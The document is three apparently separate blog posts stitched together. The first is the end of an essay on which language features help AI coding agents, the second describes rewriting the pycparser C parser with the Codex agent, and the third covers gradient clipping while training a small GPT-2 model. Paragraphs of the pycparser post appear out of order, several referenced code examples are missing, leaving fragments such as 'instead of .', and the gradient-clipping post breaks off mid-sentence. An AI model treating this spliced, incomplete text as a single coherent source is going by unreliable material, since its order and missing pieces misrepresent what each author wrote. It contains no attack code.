case, we still want to give an indication to a user, who is potentially a non-programmer, about what is going on. We want to be able to explain to a user what the code will do without going into the details of how. So the case for a new language comes down to: given the fundamental changes in who is programming and what the cost of code is, we should at least consider one. It’s tricky to say what an agent wants because agents will lie to you and they are influenced by all the code they’ve seen. But one way to estimate how they are doing is to look at how many changes they have to perform on files and how many iterations they need for common tasks. There are some things I’ve found that I think will be true for a while. The language server protocol lets an IDE infer information about what’s under the cursor or what should be autocompleted based on semantic knowledge of the codebase. It’s a great system, but it comes at one specific cost that is tricky for agents: the LSP has to be running. There are situations when an agent just won’t run the LSP — not because of technical limitations, but because it’s also lazy and will skip that step if it doesn’t have to. If you give it an example from documentation, there is no easy way to run the LSP because it’s a snippet that might not even be complete. If you point it at a GitHub repository and it pulls down individual files, it will just look at the code. It won’t set up an LSP for type information. A language that doesn’t split into two separate experiences (with-LSP and without-LSP) will be beneficial to agents because it gives them one unified way of working across many more situations. It pains me as a Python developer to say this, but whitespace-based indentation is a problem. The underlying token efficiency of getting whitespace right is tricky, and a language with significant whitespace is harder for an LLM to work with. This is particularly noticeable if you try to make an LLM do surgical changes without an assisted tool. Quite often they will intentionally disregard whitespace, add markers to enable or disable code and then rely on a code formatter to clean up indentation later. On the other hand, braces that are not separated by whitespace can cause issues too. Depending on the tokenizer, runs of closing parentheses can end up split into tokens in surprising ways (a bit like the “strawberry” counting problem), and it’s easy for an LLM to get Lisp or Scheme wrong because it loses track of how many closing parentheses it has already emitted or is looking at. Fixable with future LLMs? Sure, but also something that was hard for humans to get right too without tooling. Readers of this blog might know that I’m a huge believer in async locals and flow execution context — basically the ability to carry data through every invocation that might only be needed many layers down the call chain. Working at an observability company has really driven home the importance of this for me. The challenge is that anything that flows implicitly might not be configured. Take for instance the current time. You might want to implicitly pass a timer to all functions. But what if a timer is not configured and all of a sudden a new dependency appears? Passing all of it explicitly is tedious for both humans and agents and bad shortcuts will be made. One thing I’ve experimented with is having effect markers on functions that are added through a code formatting step. A function can declare that it needs the current time or the database, but if it doesn’t mark this explicitly, it’s essentially a linting warning that auto-formatting fixes. The LLM can start using something like the current time in a function and any existing caller gets the warning; formatting propagates the annotation. This is nice because when the LLM builds a test, it can precisely mock out these side effects — it understands from the error messages what it has to supply. For instance: Agents struggle with exceptions, they are afraid of them. I’m not sure to what degree this is solvable with RL (Reinforcement Learning), but right now agents will try to catch everything they can, log it, and do a pretty poor recovery. Given how little information is actually available about error paths, that makes sense. Checked exceptions are one approach, but they propagate all the way up the call chain and don’t dramatically improve things. Even if they end up as hints where a linter tracks which errors can fly by, there are still many call sites that need adjusting. And like the auto-propagation proposed for context data, it might not be the right solution. Maybe the right approach is to go more in on typed results, but that’s still tricky for composability without a type and object system that supports it. The general approach agents use today to read files into memory is line-based, which means they often pick chunks that span multi-line strings. One easy way to see this fall apart: have an agent work on a 2000-line file that also contains long embedded code strings — basically a code generator. The agent will sometimes edit within a multi-line string assuming it’s the real code when it’s actually just embedded code in a multi-line string. For multi-line strings, the only language I’m aware of with a good solution is Zig, but its prefix-based syntax is pretty foreign to most people. Reformatting also often causes constructs to move to different lines. In many languages, trailing commas in lists are either not supported (JSON) or not customary. If you want diff stability, you’d aim for a syntax that requires less reformatting and mostly avoids multi-line constructs. What’s really nice about Go is that you mostly cannot import symbols from another package into scope without every use being prefixed with the package name. Eg: instead of . There are escape hatches (import aliases and dot-imports), but they’re relatively rare and usually frowned upon. That dramatically helps an agent understand what it’s looking at. In general, making code findable through the most basic tools is great — it works with external files that aren’t indexed, and it means fewer false positives for large-scale automation driven by code generated on the fly (eg: , invocations). Much of what I’ve said boils down to: agents really like local reasoning. They want it to work in parts because they often work with just a few loaded files in context and don’t have much spatial awareness of the codebase. They rely on external tooling like grep to find things, and anything that’s hard to grep or that hides information elsewhere is tricky. What makes agents fail or succeed in many languages is just how good the build tools are. Many languages make it very hard to determine what actually needs to rebuild or be retested because there are too many cross-references. Go is really good here: it forbids circular dependencies between packages (import cycles), packages have a clear layout, and test results are cached. Agents often struggle with macros. It was already pretty clear that humans struggle with macros too, but the argument for them was mostly that code generation was a good way to have less code to write. Since that is less of a concern now, we should aim for languages with less dependence on macros. There’s a separate question about generics and comptime . I think they fare somewhat better because they mostly generate the same structure with different placeholders and it’s much easier for an agent to understand that. Related to greppability: agents often struggle to understand barrel files and they don’t like them. Not being able to quickly figure out where a class or function comes from leads to imports from the wrong place, or missing things entirely and wasting context by reading too many files. A one-to-one mapping from where something is declared to where it’s imported from is great. And it does not have to be overly strict either. Go kind of goes this way, but not too extreme. Any file within a directory can define a function, which isn’t optimal, but it’s quick enough to find and you don’t need to search too far. It works because packages are forced to be small enough to find everything with grep. The worst case is free re-exports all over the place that completely decouple the implementation from any trivially reconstructable location on disk. Or worse: aliasing. Agents often hate it when aliases are involved. In fact, you can get them to even complain about it in thinking blocks if you let them refactor something that uses lots of aliases. Ideally a language encourages good naming and discourages aliasing at import time as a result. Nobody likes flaky tests, but agents even less so. Ironic given how particularly good agents are at creating flaky tests in the first place. That’s because agents currently love to mock and most languages do not support mocking well. So many tests end up accidentally not being concurrency safe or depend on development environment state that then diverges in CI or production. Most programming languages and frameworks make it much easier to write flaky tests than non-flaky ones. That’s because they encourage indeterminism everywhere. In an ideal world the agent has one command, that lints and compiles and it tells the agent if all worked out fine. Maybe another command to run all tests that need running. In practice most environments don’t work like this. For instance in TypeScript you can often run the code even though it fails type checks . That can gaslight the agent. Likewise different bundler setups can cause one thing to succeed just for a slightly different setup in CI to fail later. The more uniform the tooling the better. Ideally it either runs or doesn’t and there is mechanical fixing for as many linting failures as possible so that the agent does not have to do it by hand. I think we will. We are writing more software now than we ever have — more websites, more open source projects, more of everything. Even if the ratio of new languages stays the same, the absolute number will go up. But I also truly believe that many more people will be willing to rethink the foundations of software engineering and the languages we work with. That’s because while for some years it has felt you need to build a lot of infrastructure for a language to take off, now you can target a rather narrow use case: make sure the agent is happy and extend from there to the human. I just hope we see two things. First, some outsider art: people who haven’t built languages before trying their hand at it and showing us new things. Second, a much more deliberate effort to document what works and what doesn’t from first principles. We have actually learned a lot about what makes good languages and how to scale software engineering to large teams. Yet, finding it written down, as a consumable overview of good and bad language design, is very hard to come by. Too much of it has been shaped by opinion on rather pointless things instead of hard facts. Now though, we are slowly getting to the point where facts matter more, because you can actually measure what works by seeing how well agents perform with it. No human wants to be subject to surveys, but agents don’t care . We can see how successful they are and where they are struggling.

0 views

Rewriting pycparser with the help of an LLM

pycparser is my most widely used open source project (with ~20M daily downloads from PyPI [1] ). It's a pure-Python parser for the C programming language, producing ASTs inspired by Python's own . Until very recently, it's been using PLY: Python Lex-Yacc for the core parsing. In this post, I'll describe how I collaborated with an LLM coding agent (Codex) to help me rewrite pycparser to use a hand-written recursive-descent parser and remove the dependency on PLY. This has been an interesting experience and the post contains lots of information and is therefore quite long; if you're just interested in the final result, check out the latest code of pycparser - the main branch already has the new implementation. While pycparser has been working well overall, there were a number of nagging issues that persisted over years. I began working on pycparser in 2008, and back then using a YACC-based approach for parsing a whole language like C seemed like a no-brainer to me. Isn't this what everyone does when writing a serious parser? Besides, the K&R2 book famously carries the entire grammar of the C99 language in an appendix - so it seemed like a simple matter of translating that to PLY-yacc syntax. And indeed, it wasn't too hard, though there definitely were some complications in building the ASTs for declarations (C's gnarliest part ). Shortly after completing pycparser, I got more and more interested in compilation and started learning about the different kinds of parsers more seriously. Over time, I grew convinced that recursive descent is the way to go - producing parsers that are easier to understand and maintain (and are often faster!). It all ties in to the benefits of dependencies in software projects as a function of effort . Using parser generators is a heavy conceptual dependency: it's really nice when you have to churn out many parsers for small languages. But when you have to maintain a single, very complex parser, as part of a large project - the benefits quickly dissipate and you're left with a substantial dependency that you constantly grapple with. And then there are the usual problems with dependencies; dependencies get abandoned, and they may also develop security issues. Sometimes, both of these become true. Many years ago, pycparser forked and started vendoring its own version of PLY. This was part of transitioning pycparser to a dual Python 2/3 code base when PLY was slower to adapt. I believe this was the right decision, since PLY "just worked" and I didn't have to deal with active (and very tedious in the Python ecosystem, where packaging tools are replaced faster than dirty socks) dependency management. A couple of weeks ago this issue was opened for pycparser. It turns out the some old PLY code triggers security checks used by some Linux distributions; while this code was fixed in a later commit of PLY, PLY itself was apparently abandoned and archived in late 2025. And guess what? That happened in the middle of a large rewrite of the package, so re-vendoring the pre-archiving commit seemed like a risky proposition. On the issue it was suggested that "hopefully the dependent packages move on to a non-abandoned parser or implement their own"; I originally laughed this idea off, but then it got me thinking... which is what this post is all about. The original K&R2 grammar for C99 had - famously - a single shift-reduce conflict having to do with dangling else s belonging to the most recent if statement. And indeed, other than the famous lexer hack used to deal with C's type name / ID ambiguity , pycparser only had this single shift-reduce conflict. But things got more complicated. Over the years, features were added that weren't strictly in the standard but were supported by all the industrial compilers. The more advanced C11 and C23 standards weren't beholden to the promises of conflict-free YACC parsing (since almost no industrial-strength compilers use YACC at this point), so all caution went out of the window. The latest (PLY-based) release of pycparser has many reduce-reduce conflicts [2] ; these are a severe maintenance hazard because it means the parsing rules essentially have to be tie-broken by order of appearance in the code. This is very brittle; pycparser has only managed to maintain its stability and quality through its comprehensive test suite. Over time, it became harder and harder to extend, because YACC parsing rules have all kinds of spooky-action-at-a-distance effects. The straw that broke the camel's back was this PR which again proposed to increase the number of reduce-reduce conflicts [3] . This - again - prompted me to think "what if I just dump YACC and switch to a hand-written recursive descent parser", and here we are. None of the challenges described above are new; I've been pondering them for many years now, and yet biting the bullet and rewriting the parser didn't feel like something I'd like to get into. By my private estimates it'd take at least a week of deep heads-down work to port the gritty 2000 lines of YACC grammar rules to a recursive descent parser [4] . Moreover, it wouldn't be a particularly fun project either - I didn't feel like I'd learn much new and my interests have shifted away from this project. In short, the Potential well was just too deep. I've definitely noticed the improvement in capabilities of LLM coding agents in the past few months, and many reputable people online rave about using them for increasingly larger projects. That said, would an LLM agent really be able to accomplish such a complex project on its own? This isn't just a toy, it's thousands of lines of dense parsing code. What gave me hope is the concept of conformance suites mentioned by Simon Willison . Agents seem to do well when there's a very clear and rigid goal function - such as a large, high-coverage conformance test suite. And pycparser has an very extensive one . Over 2500 lines of test code parsing various C snippets to ASTs with expected results, grown over a decade and a half of real issues and bugs reported by users. I figured the LLM can either succeed or fail and throw its hands up in despair, but it's quite unlikely to produce a wrong port that would still pass all the tests. So I set it to run. I fired up Codex in pycparser's repository, and wrote this prompt just to make sure it understands me and can run the tests: Codex figured it out (I gave it the exact command, after all!); my next prompt was the real thing [5] : Here Codex went to work and churned for over an hour . Having never observed an agent work for nearly this long, I kind of assumed it went off the rails and will fail sooner or later. So I was rather surprised and skeptical when it eventually came back with: It took me a while to poke around the code and run it until I was convinced - it had actually done it! It wrote a new recursive descent parser with only ancillary dependencies on PLY, and that parser passed the test suite. After a few more prompts, we've removed the ancillary dependencies and made the structure clearer. I hadn't looked too deeply into code quality at this point, but at least on the functional level - it succeeded. This was very impressive! A change like the one described above is impossible to code-review as one PR in any meaningful way; so I used a different strategy. Before embarking on this path, I created a new branch and once Codex finished the initial rewrite, I committed this change, knowing that I will review it in detail, piece-by-piece later on. Even though coding agents have their own notion of history and can "revert" certain changes, I felt much safer relying on Git. In the worst case if all of this goes south, I can nuke the branch and it's as if nothing ever happened. I was determined to only merge this branch onto main once I was fully satisfied with the code. In what follows, I had to git reset several times when I didn't like the direction in which Codex was going. In hindsight, doing this work in a branch was absolutely the right choice. Once I've sufficiently convinced myself that the new parser is actually working, I used Codex to similarly rewrite the lexer and get rid of the PLY dependency entirely, deleting it from the repository. Then, I started looking more deeply into code quality - reading the code created by Codex and trying to wrap my head around it. And - oh my - this was quite the journey. Much has been written about the code produced by agents, and much of it seems to be true. Maybe it's a setting I'm missing (I'm not using my own custom AGENTS.md yet, for instance), but Codex seems to be that eager programmer that wants to get from A to B whatever the cost. Readability, minimalism and code clarity are very much secondary goals. Using raise...except for control flow? Yep. Abusing Python's weak typing (like having None , false and other values all mean different things for a given variable)? For sure. Spreading the logic of a complex function all over the place instead of putting all the key parts in a single switch statement? You bet. Moreover, the agent is hilariously lazy . More than once I had to convince it to do something it initially said is impossible, and even insisted again in follow-up messages. The anthropomorphization here is mildly concerning, to be honest. I could never imagine I would be writing something like the following to a computer, and yet - here we are: "Remember how we moved X to Y before? You can do it again for Z, definitely. Just try". My process was to see how I can instruct Codex to fix things, and intervene myself (by rewriting code) as little as possible. I've mostly succeeded in this, and did maybe 20% of the work myself. My branch grew dozens of commits, falling into roughly these categories: Interestingly, after doing (3), the agent was often more effective in giving the code a "fresh look" and succeeding in either (1) or (2). Eventually, after many hours spent in this process, I was reasonably pleased with the code. It's far from perfect, of course, but taking the essential complexities into account, it's something I could see myself maintaining (with or without the help of an agent). I'm sure I'll find more ways to improve it in the future, but I have a reasonable degree of confidence that this will be doable. It passes all the tests, so I've been able to release a new version (3.00) without major issues so far. The only issue I've discovered is that some of CFFI's tests are overly precise about the phrasing of errors reported by pycparser; this was an easy fix . The new parser is also faster, by about 30% based on my benchmarks! This is typical of recursive descent when compared with YACC-generated parsers, in my experience. After reviewing the initial rewrite of the lexer, I've spent a while instructing Codex on how to make it faster, and it worked reasonably well. While working on this, it became quite obvious that static typing would make the process easier. LLM coding agents really benefit from closed loops with strict guardrails (e.g. a test suite to pass), and type-annotations act as such. For example, had pycparser already been type annotated, Codex would probably not have overloaded values to multiple types (like None vs. False vs. others). In a followup, I asked Codex to type-annotate pycparser (running checks using ty ), and this was also a back-and-forth because the process exposed some issues that needed to be refactored. Time will tell, but hopefully it will make further changes in the project simpler for the agent. Based on this experience, I'd bet that coding agents will be somewhat more effective in strongly typed languages like Go, TypeScript and especially Rust. Overall, this project has been a really good experience, and I'm impressed with what modern LLM coding agents can do! While there's no reason to expect that progress in this domain will stop, even if it does - these are already very useful tools that can significantly improve programmer productivity. Could I have done this myself, without an agent's help? Sure. But it would have taken me much longer, assuming that I could even muster the will and concentration to engage in this project. I estimate it would take me at least a week of full-time work (so 30-40 hours) spread over who knows how long to accomplish. With Codex, I put in an order of magnitude less work into this (around 4-5 hours, I'd estimate) and I'm happy with the result. It was also fun . At least in one sense, my professional life can be described as the pursuit of focus, deep work and flow . It's not easy for me to get into this state, but when I do I'm highly productive and find it very enjoyable. Agents really help me here. When I know I need to write some code and it's hard to get started, asking an agent to write a prototype is a great catalyst for my motivation. Hence the meme at the beginning of the post. One can't avoid a nagging question - does the quality of the code produced by agents even matter? Clearly, the agents themselves can understand it (if not today's agent, then at least next year's). Why worry about future maintainability if the agent can maintain it? In other words, does it make sense to just go full vibe-coding? This is a fair question, and one I don't have an answer to. Right now, for projects I maintain and stand behind , it seems obvious to me that the code should be fully understandable and accepted by me, and the agent is just a tool helping me get to that state more efficiently. It's hard to say what the future holds here; it's going to interesting, for sure. There was also the lexer to consider, but this seemed like a much simpler job. My impression is that in the early days of computing, lex gained prominence because of strong regexp support which wasn't very common yet. These days, with excellent regexp libraries existing for pretty much every language, the added value of lex over a custom regexp-based lexer isn't very high. That said, it wouldn't make much sense to embark on a journey to rewrite just the lexer; the dependency on PLY would still remain, and besides, PLY's lexer and parser are designed to work well together. So it wouldn't help me much without tackling the parser beast. The code in X is too complex; why can't we do Y instead? The use of X is needlessly convoluted; change Y to Z, and T to V in all instances. The code in X is unclear; please add a detailed comment - with examples - to explain what it does.

0 views
Giles's blog 3 weeks ago

Writing an LLM from scratch, part 32b -- Interventions: gradient clipping

I'm still working on training the best GPT-2 small sized base model that I can with a number of FLOPs roughly equal to two days on my own machine -- my "extra credit" exercise after having worked through Sebastian Raschka 's book " Build a Large Language Model (from Scratch) ". In the last post I trained a baseline model -- one with the same architecture and almost the same training code as in the minimal training run in the book, just modified to run using DDP on an 8x A100 40 GiB/GPU machine in the cloud. There are a bunch of "interventions" I want to try to see if they'll make it better, as measured by the loss they get on a test set. I'll do a post for each intervention, and this is the first: gradient clipping. In the training chart for the baseline model, you can see that there are three places where the loss suddenly spiked up, at around global steps 4,200, 13,000, and 23,000: There are a number of things that could cause loss spikes like that: Exploding gradients are common in RNNs, and also happen in LLMs like this one. I spent a bit of time reading around to find out how they happen, and the ah-ha moment came when I came across this post from Wanshun Wong . Not only is the post itself a good intro in terms of how it affects RNNs, but in the "further reading" at the end, there's some gold: Chapter 10.11 of [1] has a good overview of how gradient clipping works. Now, I bought a copy of " Deep Learning " at the same time as I bought Raschka's book, but I'd only glanced through it. Now was the time to get it down from the shelf -- and, indeed, section 10.11.1 is all about clipping to handle exploding gradients. I'll put the explanation of how they happen into my own words, to see if I can clarify things (at least in my mind). Normally, when we learn about gradient descent, it's illustrated with nice smooth loss charts like this imaginary one for a single-parameter model: We're told that we might start at point A. The gradient is quite high and negative, so we multiply it by our learning rate and subtract it from our parameter. That gets us to point B. This time around, the gradient is smaller as the curve is flatter there, so when we do the same -- multiply by LR and subtract -- we take a smaller step, and wind up at C. Rinse and repeat and we'll wind up near the minimum. The problem is, what if the loss curve actually looks like this: We start at A, with a small gradient, move a little to the right, and now we're at B halfway down a cliff! The gradient is massive, and when we subtract it, even scaled by the learning rate, we can zoom off somewhere to the right -- maybe not even on the chart. Indeed, you can imagine a cliff that is so steep that it would have vertical portions -- negative infinite gradients in this case -- and no matter what your learning rate is, you'll wind up with an infinite parameter update and everything will break. It's hard to see how a model can continue training in a case like that. Now, what can cause steep cliffs like that? The book says "strongly nonlinear functions, such as those computed by a recurrent neural net over many time steps". If you know about RNNs (I wrote about them if you'd like a summary), you'll remember that a single RNN might be quite shallow -- maybe three or four layers -- but when you're doing backpropagation, you run a number of inputs through, one after the other, work out the overall loss, and then "unroll" it to something similar to a "vanilla" neural net to do the backward pass. To put that in concrete terms, a 3-layer neural network trained with a 100-element sequence would unroll to a 300-layer deep network. Every one of those layers has several operations, including (in the implementation I was looking at in my post above), a t a n h . It's not surprising that there are cliffs in the loss landscape -- it's more surprising that there are any smooth bits! Now in LLMs, we don't have that unrolling through time -- but our network is deep enough as it is. For the GPT-2 small model, disregarding the embeddings and the final output head, we have 12 Transformer layers, each of which is multiple matrix multiplications for attention, then a softmax, then another layer, and then a feed-forward... mapping precisely to the equivalent vanilla NN is hard, but I think you can treat each one as at least four layers, so we've got 48. And there are GELUs and logs and exps 1 dotted around, so again -- we should expect cliffs. So if sometimes we'll get crazy gradients, what can we do about them? We clip them. Clipping gradients simply means that if they get larger than a particular number -- v , which we define -- we reduce them to that number. In other words, we have a cap on how big they can get. "Deep Learning" ("DL" from now on) suggests two ways to do it. Remember that while in the example above, we only had one parameter -- on the X axis -- for the GPT-2 small LLM we're training, we have 163 million of them. So the gradients, instead of being one number, will be a 163M-long vector, one per parameter. The two ways to clip are: The second feels more elegant -- we're scaling all of the elements of the gradient vector by the same amount, so it still points in the same direction. Interestingly, though, DL says that the two methods "work similarly", which I'll read as "are pretty much the same in practice". DL then goes on to say how infinite or not-a-number gradients should be handled. With the first way, clearly doing it naively would set every element in the gradient vector to v , which would make the total size (norm) of the update very large. With the second, it be even worse -- we'd still wind up with completely junk gradients, because the norm would be infinite, and in Python is , so we'd be applying gradients with NaNs in them at best. That would be likely to knock our model into unrecoverable territory, as any parameter that had that applied to it would be NaN forever. Their suggested solution is that if you get garbage gradients like that, you can take a random step -- that is, create a new gradient to apply that has the norm v but just points in a random direction. The idea is that this will move you away from the cliff-ridden part of the loss landscape where you've found yourself (more about that later), and things will continue nicely. So, anyway, how to do this in practice? PyTorch has a function, , and that's what's referenced in almost every bit of writing I've found about how to clip gradients. So I decided to use that, assuming it would do what was described in DL's second option and that it would do the random updates they suggest for non-finite gradients. (I was half-correct -- see later.) As to how to use it -- if we had a normal training loop, where we were just using a normal optimiser, we would go from: ...to something like ...where is the max value v from above. However, for our training code using Automatic Mixed Precision (AMP), it's a little more complicated -- but luckily, the AMP explainer we've been using has a section explaining what to do . Right now we have this: Per that explainer, we need to move to this: That looks a bit weird; we're "unscaling" the gradients, then clipping them, then using the scaler to step the optimiser. You'd think that you'd need to "re-scale" the scaler after clipping the gradients -- to get back to where you started from before the optimiser step. From the help page I gather it keeps track of whether or not the gradients it has right now are currently scaled and handles them appropriately based on that state in . Anyway, given that we know what the code looks like now, we need to implement it in a way that can be easily switched on for this experiment (and potentially in the future), but which also allows us to not use it if we don't want to. The best way with our setup is to make it a training option, so we can do it this way: ...with extracted from the file where we call it in : ...and we can just pass in for it in our function that we use to find the maximum micro-batch size for our current hardware, as all we're testing for there is memory usage -- we don't care if we're doing good updates. Here's the code delta for that , plus a bugfix to allow for files without a in them. But it would also be useful to be able to track when it "fired" -- that is, when we had to clip our gradients. Then we can see two things: Now, the docs for say that it returns the "[t]otal norm of the parameter gradients (viewed as a single vector)". It doesn't say whether that's before or after the clipping, but given that the return value would always be if it was after, I'm going to guess that it returns the pre-clipping norm (ChatGPT agrees). So we can chart that; changes in these diffs: 1 , 2 , 3 , 4 . So we now have code to clip gradients to a given norm size and to chart the gradient norms so that we know what they were before clipping. The question is, what should that clipping norm be? Some googling around suggested that there was no standard way of saying "for such-and-such a kind of model, gradients should be clipped at around x ". For example, on this Reddit thread , says "Common values are 1, 3, 5, 8, 10", and likewise sample code in this tutorial . has 1, as does this one . So my initial thought was, let's just use 1. But then I wondered, what actually are the gradient norms that we're getting in normal training? I decided to run a local short train on 3m tokens (a thousandth of the full training set, taking just less than four minutes) with very frequent checkpointing, and gradient clipping set to 1, and see what happened. You can see that the "grad max" line is almost always above the "grad clip" -- we're almost always clipping. This doesn't sound right. It looked like the range of the grad max was generally beween 1.1 and a little above 3, so I set the to 3.5 and did another train: Our loss is about the same, but we're no longer clipping -- and that's what we want; there was no evidence of exploding gradients for that short run -- just big updates near the start, as you'd expect. I then ran the same with no gradient clipping at all, and got exactly the same shape for the loss chart as I did with gradient clipping at 3.5, and the same final loss -- that's a good signal that clipping is not affecting the train when we stay inside the limit, which is exactly what we want. So, it was time to train our model! I kicked off the train, and after a little while, I looked at the training chart, which is updated dynamically as the model trains: You can see the dotted green lines, both the light one and the dark one -- that is, the "grad max" and the "grad avg" -- disappear starting just before global step 4,000, only coming back at about 5,500 -- that is, these were not plotted for global steps 4,319 and 4,936, even though the loss was. What was going on? I took a look at the checkpoint meta file for the first of those to see what the actual numbers were, and saw this: Aha! The PyPlot code I was using could not handle infinite values, which is entirely reasonable. That was easy enough to fix , though -- I just replaced positive infinity by 1,000,000 and negative infinity by -1,000,000, and then (in the interest of getting a proper from-scratch run) kicked everything off from the beginning. That training run completed with this chart: That's a little hard to read, but if you look closely at the green lines, you can see that there are seven periods where gradients were either very large or infinite. Weirdly, though, out of the seven, two of them were two checkpoint periods long (that is, two periods of 617 global steps). That felt weird, though of course we're looking at the maximum gradient norm and the average gradient norm -- so two single infinite/high-gradient steps in successive 617-step periods would lead to that effect. What was even stranger, though, was that if you look at the training chart for the run with no gradient clipping, we have only three loss spikes rather than seven: ...though it's also very noticeable that the gradient-clipped run had only two small loss spikes, unlike the three larger ones in the unclipped run. The training loss the gradient-clipped run reported at the end was better, too: ...versus 3.743 at the end of the baseline train. So it was time to download it, and run the sequence-completion smoke test: Coherent enough! Next, we evaluate it against our held-back test set: So, the loss had gone down -- but only from 3.743 to 3.678, a reduction of 0.065, or about 1.7%. That's not actually all that bad! After all, in my initial experiments on my local machine, training for a Chinchilla-optimal number of tokens from FineWeb-Edu (rather than the regular FineWeb I'm using now) got a loss of 4.167 on the same dataset (weirdly worse with the more-curated training set), and training for a further Chinchilla-optimal number of tokens only brought that down to 4.135, for a difference of 0.032, or 0.7%. It's not strictly comparable due to the different training sets, but speaking very loosely, we could say that gradient clipping for this train had more effect than doubling the training time for the other one. That's pretty nifty. But the question remained: why those long periods of high gradients, even with gradient clipping? And why were there still loss spikes -- in particular the one just before global step 12,000, which lasted for two checkpoint periods? Remember that when I started the first run of this train, and got the chart with the missing bits, it was because the logged and were infinite. What happens when gets an infinite gradient -- either one that has an infinity as one of its components, or one that (due to numerical overflow) winds up with a norm of infinity anyway? I'd been kind of assuming that it did what the authors described in "Deep Learning" -- a random update of norm v -- given that the book stated pretty confidently that you "can" do it but then appeared to consider the topic closed. But it doesn't! If you check that link to the docs, you'll see that it has a parameter , which is by default. If it's set to , that will raise an exception if the norm is positive or negative infinity, or if it's not a number -- which catches both the infinite component and the norm overflow cases above. But if it's not set -- and we weren't setting it -- and the norm or the gradients are non-finite, then will essentially return garbage gradients. Depending on the exact cause, elements will either be infinities of one sign or another, or NaNs. And if these are added to parameters, then those parameters will become garbage too. Now that leads to the question, given that we know that somewhere in the period between the checkpoint at global step 4,319 and the previous one at 3,702 there was an infinite norm at some point, how on earth did the model manage to continue training after that? Loss went up at around the same time, but it wasn't completely broken as it would have been with NaNs or infinities in its parameters. Obscurely enough, the answer turned out to be in the AMP explainer , in a comment in one of the bits of example code. Regarding the class we're using: So what was happening was that the scaler -- something we introduced into our code to get a speedup by using 16-bit floats instead of 32-bit whenever PyTorch thought it would make sense -- was protecting us against infinite and NaN gradients as a side-effect. It was skipping updates that would have polluted our weights with bad values from non-finite gradients. If the above comes across as a little frustrated, then it's because I am a bit! From a software engineering viewpoint, this situation really does feel a bit like a rather messy part of the API. There are three things that it's reasonable for a library to do with infinite/NaN gradients: Now, if we look at that , we can see that the first two of those cases are handled there; and the developer can choose which option to follow. It's not where I'd personally put it (the function on the optimiser seems more natural) and I think I'd probably set the default to too, but I can also imagine good reasons for it being the way it is -- backward compatibility for one. But the "skip non-finite gradients" being a (not even optional!) behaviour that is on a class designed for handling mixed-precision training just seems outright bonkers. I would be surprised if there weren't people out there who've spent days trying to work out why their training runs failed catastrophically when they decided to switch from mixed-precision to "full fat" 32-bit floats, not realising that a hardly-even-documented feature of the scaler 3 had been saving them from gradient issues previously. Anyway, rant over. What does this all mean? There are three ways a gradient can explode: With both the baseline code and our new code, the was saving us from the last two of those, by skipping the optimiser steps with non-finite gradients. However, the baseline run was not protected against the first kind -- large but finite gradients with a finite norm -- while this run was protected. What I'm almost certain is happening here is that in all of my training runs so far, there have been all three kinds of issues with exploding gradients. The , which again, we introduced for faster training, happened to be saving us from the infinite gradients/norms. But we were still being bitten by the finite but excessively large ones. And that, I think, is why this training run had a positive -- not huge, but certainly worthwhile -- effect on the test set loss. If I had more time, I think I'd do another run, logging all three of those categories of error to see how frequent they are, and charting the result. That might go some way to explaining the final question I had here: why is it that the renowned "Deep Learning" suggests a random update to get away from the cliff where you've found yourself, while we seem to be getting away with just skipping the update, which is much simpler? Well, the book was written in 2016, and I guess rather a lot has changed in the last 10 years :-) My guess is that their solution might have been a solid default in the age of RNNs, but might not make so much sense with the kind of models we're training these days. I think I can see a way in which that makes sense. Think of the illustration of a loss "cliff" in a one-parameter world that we had at the start of this post: If you happen to wind up on that cliff, you're in trouble. But imagine a two-parameter model -- the line of the loss function becomes a surface. Just as in the real world you might be able to walk along the edge at the top of a cliff and find a nice easy slope down next to it, you can imagine that the cliff in the two-parameter case might be less of a problem because you don't need to be lucky enough to jump down it -- you can walk around it. Extrapolating examples like this to higher dimensions is risky, but I think it should hold that the more dimensions you're working with, the less likely it is that a cliff is an issue -- you're more likely to be able to find a way around it. I've heard a very similar argument made for why local minima are less of an issue with lots of parameters. It's certainly worth saying that this is far from a mathematical proof, but I think it's a decent grounding for intuition. Now think about an RNN. Although you're doing back-propagation through time over what amounts to a very deep network, there aren't actually all that many parameters, certainly compared to an LLM like this. Each parameter is involved in the back-propagation multiple times. So, thinking of it that way, the gradient vector for the RNNs they were dealing with was of much lower dimensionality than the ones we're dealing with, even for this tiny model. They say that the random step "will typically move away from the numerically unstable configuration". I'm probably playing fast and loose here, but I'll take that as something like: if you wound up on a cliff, you were likely in a very "cliffy" area of the loss landscape. "Teleporting" randomly to somewhere some distance away was a sensible way to handle that. In our situation, even if the area is "cliffy" in the direction that one particular batch might push us, we have so many extra dimensions that it may well be that it won't be so bad with the next one. So just skipping the problematic update -- under all of those assumptions -- seems a perfectly reasonable way to handle it. All of this, BTW, made me think back to validation loss. In our previous training runs, where we were measuring it just before each checkpoint, its spikes were in general correlated with but not identical to spikes in training loss: Now, of course, exploding gradients don't have to be related to high training loss -- there's enough non-linearity in there that we can treat them as being completely uncorrelated, I think. But you definitely would expect them to have an effect on validation loss if applied. Disregarding the infinite ones (which were being filtered out anyway), the very high ones that we are now clipping would, in the unclipped baseline train, seem very likely to have caused validation loss spikes. So: if I hadn't stripped that out, we would likely have been able to see a clear difference in the validation loss line between clipped and unclipped. That would have been useful! I'm not going to re-introduce it, though. Best to keep the number of code changes to a minimum if I'm trying to compare like with like over the course of these intervention tests. I think that's enough for gradient clipping. I may come back and do the experiment another time to see what the relative ratios of the different kinds of problematic gradients are. Are there parts of the train where we get lots of them as a percentage (ie. we're somewhere "cliffy" in the loss landscape)? How many infinite gradient vs infinite norm vs big-but-not-infinite instances do we have relative to each other, and to normal gradient updates? What do we see if we have validation loss? And so on. But for now: gradient clipping definitely helps, and goes on the positive interventions list! I'm thinking I'll see what happens with switching off dropout next. That should at least be a bit easier... Stay tuned! Oh my .  ↩ Technically the L2 norm -- if you used cubes/cube root it would be L3, and likewise for the power of four and L4 and so on. But the L2 is the one used for gradient clipping.  ↩ Shades of Douglas Adams , really: "But the plans were on display..." "On display? I eventually had to go down to the cellar to find them." “That’s the display department." “With a flashlight." “Ah, well, the lights had probably gone." “So had the stairs." “But look, you found the notice, didn’t you?" “Yes," said Arthur, “yes I did. It was on display in the bottom of a locked filing cabinet stuck in a disused lavatory with a sign on the door saying ‘Beware of the Leopard."  ↩ A "bad batch" -- that is, one batch, or even one sequence in a batch, was massively different in structure to the others that the model had seen, so it just had much worse loss. That doesn't seem likely in this case, though: the numbers on the chart are averages over 617 global steps each, and it would take a truly pathological sequence to move the needle that much. Something weird in the optimiser. That's not something I understand well, but according to the various LLMs I'm working with, it's a 